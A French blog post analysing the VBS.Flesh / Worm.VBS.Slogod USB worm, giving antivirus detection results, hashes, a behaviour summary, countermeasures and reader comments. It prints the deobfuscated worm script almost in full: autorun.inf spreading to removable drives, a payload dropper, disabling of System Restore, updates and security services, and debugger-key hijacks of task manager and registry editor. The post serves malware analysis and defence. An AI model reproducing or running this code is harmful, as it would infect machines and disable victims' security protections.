VBS.Flesh / Worm.VBS.Slogod : Autorun par VBS

Rencontré régulièrement sur les forums de désinfection ce VBS.Flesh / Worms.Slogod est un vers qui se propage par média amovibles.
L’originalité est que ce dernier est écrit en VBS, en réalité, ce n’est pas vraiment une originalité, puisque les premiers vers par média amovible était justement écrits en VBS justement le VBS.Solow : http://forum.malekal.com/infection-sur-disques-amovibles-t3350.html

A noter qu’il existe une vieille page de désinfection, ici, pour ce vers : http://www.malekal.com/2010/11/12/supprimer-vbssolow-b-vbszync/

 

 

Enfin l’infection est bien gérée par USBFix.

 

La détection du VBS : http://www.virustotal.com/file-scan/report.html?id=4ee7b8d67956b5235f3170bd8ff03e6679d1a99c625182bc13e618c7ff7d004a-1317286886

File name: photo-v2.jpg
Submission date: 2011-09-29 09:01:26 (UTC)
Current status: finished
Result: 17 /43 (39.5%)	VT Community

Print results  Antivirus	Version	Last Update	Result
AntiVir	7.11.15.64	2011.09.28	VBS/Drop.Agent.D
BitDefender	7.2	2011.09.29	VBS.Flesh.A
Comodo	10277	2011.09.29	UnclassifiedMalware
Emsisoft	5.1.0.11	2011.09.29	Worm.VBS.Slogod!IK
F-Secure	9.0.16440.0	2011.09.29	VBS.Flesh.A
Fortinet	4.3.370.0	2011.09.29	W32/VBSlog.A
GData	22	2011.09.29	VBS.Flesh.A
Ikarus	T3.1.1.107.0	2011.09.29	Worm.VBS.Slogod
Kaspersky	9.0.0.837	2011.09.29	HEUR:Trojan-Dropper.Script.Generic
Microsoft	1.7702	2011.09.29	Worm:VBS/Slogod.X
NOD32	6501	2011.09.29	VBS/Packed.Runner.C
nProtect	2011-09-29.01	2011.09.29	VBS.Flesh.A
PCTools	8.0.0.5	2011.09.29	Malware.VBS-Solow
Symantec	20111.2.0.82	2011.09.29	VBS.Solow
TrendMicro	9.500.0.1008	2011.09.29	Mal_Runauto
TrendMicro-HouseCall	9.500.0.1008	2011.09.29	Mal_Runauto

MD5   : 33a6ade15866e5d93909b7bb6e8d3333
SHA1  : 06d53a80071e156dacb0a60439178e8c363afa48
SHA256: 4ee7b8d67956b5235f3170bd8ff03e6679d1a99c625182bc13e618c7ff7d004a

Le script est offusqué, une boucle for décrypte le code et lance son exécution :

En récupérant le code, on obtient ceci :

Le code créer un fichier autorun.inf et les écrits dans les medias-amovibles – le contenu du fichier autorun.inf : « [autorun] =Wscript.exe /e:vbs photo-v2.jpg »
C’est donc le script VBS qui est copier et lancé à l’exécution du média.

  • Le script est ensuite copier dans le dossier system32 sous le nom de fichier \system32\winjpg.jpg
  • Le malware créer un fichier \system32\winxp.exe via la variable shex via une conversion – ici le contenu de shex est gommé.
  • puis le malware écrit dans le registre afin de charger le fichier winxp.exe au démarrage – on retrouve d’ailleurs la clef MS32DLL spécifique à Sollow
  • le malware arrete aussi le service du Centre de Sécurité, créer des clefs Debbuger sur des programmes comme le gestionnaire de tâches, éditeur de registre etc, à chaque execution de ces programmes, cela lancera le malware
  • Enfin le Malware modifie des clefs afin de supprimer l’affichage des fichiers cachés.

 

on error resume next
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=Wscript.exe /e:vbs photo-v2.jpg"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set reg=createobject("WScript.Shell")
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath&"\system32\winxp.exe") : tf.attributes=32
set reg=createobject("WScript.Shell")
ObjTextStream.write sText
ObjTextStream.close
shex= "xxxxxx"
bByte = hextoByte(shex)
Set ObjTextStream = fs.Createtextfile(winpath&"\system32\winxp.exe",True)
ObjTextStream.write bByte
ObjTextStream.close
reg.Run winpath&"\system32\winxp.exe", 1, False
Function hextoByte(sData)
For lCounter = 1 To Len(sData) Step 2
hextoByte = hextoByte & Chr("&h" & Mid(sData, lCounter, 2))
Next
End Function
resultat = reg.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\")
reg.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing","1","REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR","1","REG_DWORD"
reg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "MP3 Audio", "REG_SZ"
reg.regwrite "HKEY_CLASSES_ROOT\mp3file\FriendlyTypeName", "Good Songs", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEMCurrentControlSet\Services\SharedAccess\Start",4,"REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Start",4,"REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start",4,"REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride",1,"REG_DWORD"
reg.regwrite "HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s\command\",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_CLASSES_ROOT\exefile\shell\Open application\command\",winpath&"\system32\winxp.exe" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwinxp.exe\Debugger",winpath&"\system32\winxp.exe" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger",win&"\winxp.exe" ,"REG_SZ"
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\system32\winjpg.jpg")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\system32\winjpg.jpg",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\system32\winjpg.jpg")
tf.attributes = 39
do
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\photo-v2.jpg")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\photo-v2.jpg",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\photo-v2.jpg")
tf.attributes = 39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 39
end if
next
set reg = createobject("WScript.Shell")
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\regdiit",winpath&"\system32\winxp.exe"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\CTFMON",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot"
reg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
if check <> 1 then
Wscript.sleep 10000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Contre mesures : Désactiver les VBS et Windows Scripting Host (WSH)

Si vous n’utilisez pas les VBS et autres scripts, il est alors recommandé de désactiver l’exécution des VBS qui peuvent être un vecteur d’infection.
Une des techniques consistent à enlever l’associations de fichiers .VBS  – Le programme NoScript de Symantec le fait pour vous : http://service1.symantec.com/sarc/sarc.nsf/html/win.script.hosting.html

Mais cela ne protège pas du malware présenté sur ce billet puisque ce dernier lance wscript avec en paramètre le script VBS avec une extension qui n’est pas un .VBS – ici c’est un .JPEG, le malware se faisant passer pour une image.
Il est alors recommandé de supprimer les droits en ’exécution sur le fichier C:\Windows\System32\wscript.exe (ou le renommer), afin d’empêcher le lancement de script.

Plus généralement, pour les infections par médias amovibles et la sécurité relatifs à ces médias, lire : Sécurité : Maitriser ses médias amovibles

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 90 times, 1 visits today)

4 thoughts on “VBS.Flesh / Worm.VBS.Slogod : Autorun par VBS

  1. Bonjour,

    Tout d’abord, merci pour l’information (et d’une manière générale pour tout ton site qui est une mine d’or) !

    Pour info, NOD32 (v5) bloque cette page (une variante probable de VBS/Butsur.B ver), KIS2012, lui, ne bronche pas.

    Bonne journée !

  2. @Brindille : Vu qu’il met le code source (entier?) dans la page donc logique qu’il déclenche une alerte…ce qui est plus grave quand KIS (ou autre) ne bronche pas donc une variante où ce site serait infecté (puisque le vbs est possible en page web) infecterai ton pc !

    +1 pour nod32 😉

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *